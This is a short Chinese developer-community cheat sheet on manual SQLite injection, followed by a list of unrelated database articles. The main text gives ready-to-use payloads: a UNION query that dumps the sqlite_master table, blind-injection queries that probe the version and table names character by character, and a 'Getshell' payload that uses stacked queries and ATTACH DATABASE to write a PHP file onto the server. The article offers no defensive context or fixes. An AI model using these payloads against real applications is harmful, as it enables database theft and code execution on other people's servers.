AI 助理
备案控制台
开发者社区 数据库 文章 正文

SQLite手工注入方法小结

2016-08-11 1484
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: SQLite 官网下载:www.sqlite.org/download.html sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index   sqlite_master隐藏表,具体内容如下: 字段:type/name/tb...

SQLite 官网下载:www.sqlite.org/download.html

sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index

 

sqlite_master隐藏表,具体内容如下:

字段:type/name/tbl_name/rootpage/sql

 

 sqlite注入测试:

 

 1、Union select 查询

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

 

2、盲注

 

select * from test where id =1 union select 1,length(sqlite_version())=6    //得到sqlite版本位数

select * from test where id =1 and substr(sqlite_version(),1,1)='3'            //得到sqlite版本首位为3

select * from test where id =1 and substr((select name from sqlite_master where type='table' limit 0,1),1,1)='T'  (大小写区分,有差别)  //得到sqlite表名第一位为T

 

 3、Getshell

 

select * from test where id =1 ;ATTACH DATABASE 'C:\\Sqlite\\xiaozi.php' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (' <?php phpinfo(); ?> '); --

 

 

参考链接:

Win7下SQLite安装配置与使用方法详解:http://www.codeceo.com/article/win7-sqlite-usage.html

Windows下安装配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

文章标签:
PHP
SQL
Windows
数据库管理
关键词:
sqlite数据库
方法数据库
注入数据库
bypass
目录
相关文章
大数据文摘
|
5月前
|
人工智能 运维 关系型数据库
数据库运维:mysql 数据库迁移方法-mysqldump
本文介绍了MySQL数据库迁移的方法与技巧,重点探讨了数据量大小对迁移方式的影响。对于10GB以下的小型数据库,推荐使用mysqldump进行逻辑导出和source导入;10GB以上可考虑mydumper与myloader工具;100GB以上则建议物理迁移。文中还提供了统计数据库及表空间大小的SQL语句,并讲解了如何使用mysqldump导出存储过程、函数和数据结构。通过结合实际应用场景选择合适的工具与方法,可实现高效的数据迁移。
大数据文摘
1036 1
站大爷
|
2月前
|
存储 数据库 开发者
Python SQLite模块:轻量级数据库的实战指南
本文深入讲解Python内置sqlite3模块的实战应用,涵盖数据库连接、CRUD操作、事务管理、性能优化及高级特性,结合完整案例,助你快速掌握SQLite在小型项目中的高效使用,是Python开发者必备的轻量级数据库指南。
站大爷
282 0
蓝易云
|
3月前
|
存储 关系型数据库 MySQL
MySQL数据库中进行日期比较的多种方法介绍。
以上方法提供了灵活多样地处理和对比MySQL数据库中存储地不同格式地日子信息方式。根据实际需求选择适当方式能够有效执行所需操作并保证性能优化。
蓝易云
432 10
游客kufrkwrbkmpsa
|
8月前
|
数据库
【YashanDB知识库】数据库一主一备部署及一主两备部署时,主备手动切换方法及自动切换配置
【YashanDB知识库】数据库一主一备部署及一主两备部署时,主备手动切换方法及自动切换配置
游客kufrkwrbkmpsa
314 0
【YashanDB知识库】数据库一主一备部署及一主两备部署时,主备手动切换方法及自动切换配置
蓝易云
|
4月前
|
SQL Oracle 关系型数据库
比较MySQL和Oracle数据库系统,特别是在进行分页查询的方法上的不同
两者的性能差异将取决于数据量大小、索引优化、查询设计以及具体版本的数据库服务器。考虑硬件资源、数据库设计和具体需求对于实现优化的分页查询至关重要。开发者和数据库管理员需要根据自身使用的具体数据库系统版本和环境,选择最合适的分页机制,并进行必要的性能调优来满足应用需求。
蓝易云
249 11
游客nsyhaoxcmeiq6
|
6月前
|
存储 算法 Java
实现不同数据库的表间的 JOIN 运算的极简方法
跨库计算是数据分析中的常见难题,尤其涉及多数据库系统时,表间 JOIN 操作复杂度显著提升。esProc 提供了一种高效解决方案,能够简化跨库 JOIN 的实现。例如,在车辆管理、交管和公民信息系统中,通过 esProc 可轻松完成如下任务:按城市统计有车公民事件数量、找出近一年获表彰的车主信息,以及按年份和品牌统计车辆违章次数。esProc 支持不同关联场景(如维表关联与主子表关联)的优化算法,如内存索引、游标处理和有序归并,从而大幅提升编码和运算效率。无论是同构还是异构数据源,esProc 均能灵活应对,为复杂数据分析提供强大支持。
游客nsyhaoxcmeiq6
196 17
光明顶阳顶天
|
存储 监控 安全
数据库多实例的部署与配置方法
【10月更文挑战第23天】数据库多实例的部署和配置需要综合考虑多个因素,包括硬件资源、软件设置、性能优化、安全保障等。通过合理的部署和配置,可以充分发挥多实例的优势,提高数据库系统的运行效率和可靠性。在实际操作中,要不断总结经验,根据实际情况进行调整和优化,以适应不断变化的业务需求。
光明顶阳顶天
376 1
蓝易云
|
7月前
|
Oracle 安全 关系型数据库
【Oracle】使用Navicat Premium连接Oracle数据库两种方法
以上就是两种使用Navicat Premium连接Oracle数据库的方法介绍,希望对你有所帮助!
蓝易云
1544 28
青云交(Java大数据AI云原生Python)
|
7月前
|
SQL 关系型数据库 MySQL
大数据新视界--大数据大厂之MySQL数据库课程设计:MySQL 数据库 SQL 语句调优方法详解(2-1)
本文深入介绍 MySQL 数据库 SQL 语句调优方法。涵盖分析查询执行计划,如使用 EXPLAIN 命令及理解关键指标;优化查询语句结构,包括避免子查询、减少函数使用、合理用索引列及避免 “OR”。还介绍了索引类型知识,如 B 树索引、哈希索引等。结合与 MySQL 数据库课程设计相关文章,强调 SQL 语句调优重要性。为提升数据库性能提供实用方法,适合数据库管理员和开发人员。
青云交(Java大数据AI云原生Python)
324 11
蓝易云
|
7月前
|
SQL 数据库连接 数据库
在C++的QT框架中实现SQLite数据库的连接与操作
以上就是在C++的QT框架中实现SQLite数据库的连接与操作的基本步骤。这些步骤包括创建数据库连接、执行SQL命令、处理查询结果和关闭数据库连接。在实际使用中,你可能需要根据具体的需求来修改这些代码。
蓝易云
469 14

热门文章

最新文章

  • 1
    除了JDBC,还有哪些常见的数据库访问技术?
  • 2
    云栖大会|AI时代关系型数据库创新突破:软硬协同赋能企业数智化转型
  • 3
    云栖大会|AI时代的数据库变革升级与实践:Data+AI驱动企业智能新范式
  • 4
    阿里云RDS云数据库全解析:产品功能、收费标准与活动参考
  • 5
    AI大模型应用实践 八:如何通过RAG数据库实现大模型的私有化定制与优化
  • 6
    云栖重磅|瑶池数据库:从云原生数据底座向“AI就绪”的多模态数据底座演进
  • 7
    通义灵码产品演示: 数据库设计与数据分析
  • 8
    云栖大会|AI浪潮下的NoSQL演进:下一代数据库的破局之道
  • 9
    Python SQLAlchemy模块:从入门到实战的数据库操作指南
  • 10
    免费体验!高效实现自建 MySQL 数据库平滑迁移至 PolarDB-X
  • 1
    GitHub 热门!MindsDB 破解 AI + 数据库瓶颈,究竟有什么惊艳亮点?只需 SQL 即可实现智能预测
    997
  • 2
    MySQL数据库上云迁移
    181
  • 3
    数据库运维:mysql 数据库迁移方法-mysqldump
    1036
  • 4
    客户说|知乎基于阿里云PolarDB,实现最大数据库集群云原生升级
    499
  • 5
    无代码革命:10分钟打造企业专属数据库查询AI机器人
    630
  • 6
    高性能云盘:一文解析RDS数据库存储架构升级
    438
  • 7
    诚邀您参加《智启云存:AI时代数据库RDS存储新突破》线上闭门技术沙龙!
    185
  • 8
    oracle数据恢复—oracle数据库执行错误truncate命令的数据恢复案例
    295
  • 9
    软考软件评测师——数据库系统应用
    157
  • 10
    数据库云大使618活动重磅来袭!
    254

    • 相关课程

    更多
  • 数据库的前世今生
  • 数据库核心概念
  • 从传统数据库到云数据库演进
  • 数据库常见问题排查
  • 数据库及SQL/MySQL基础
  • 高校精品课-西安交通大学 -数据库理论与技术

    • 相关电子书

    更多
  • 开源数据库工作室推广计划
  • 国产数据库研制人才培养实践
  • 阿里云&信通院《Serverless数据库技术研究报告》
    • 下一篇
    阿里云负载均衡收费标准:ALB、NLB和CLB价格,包括LCU费用、实例费和公网带宽价格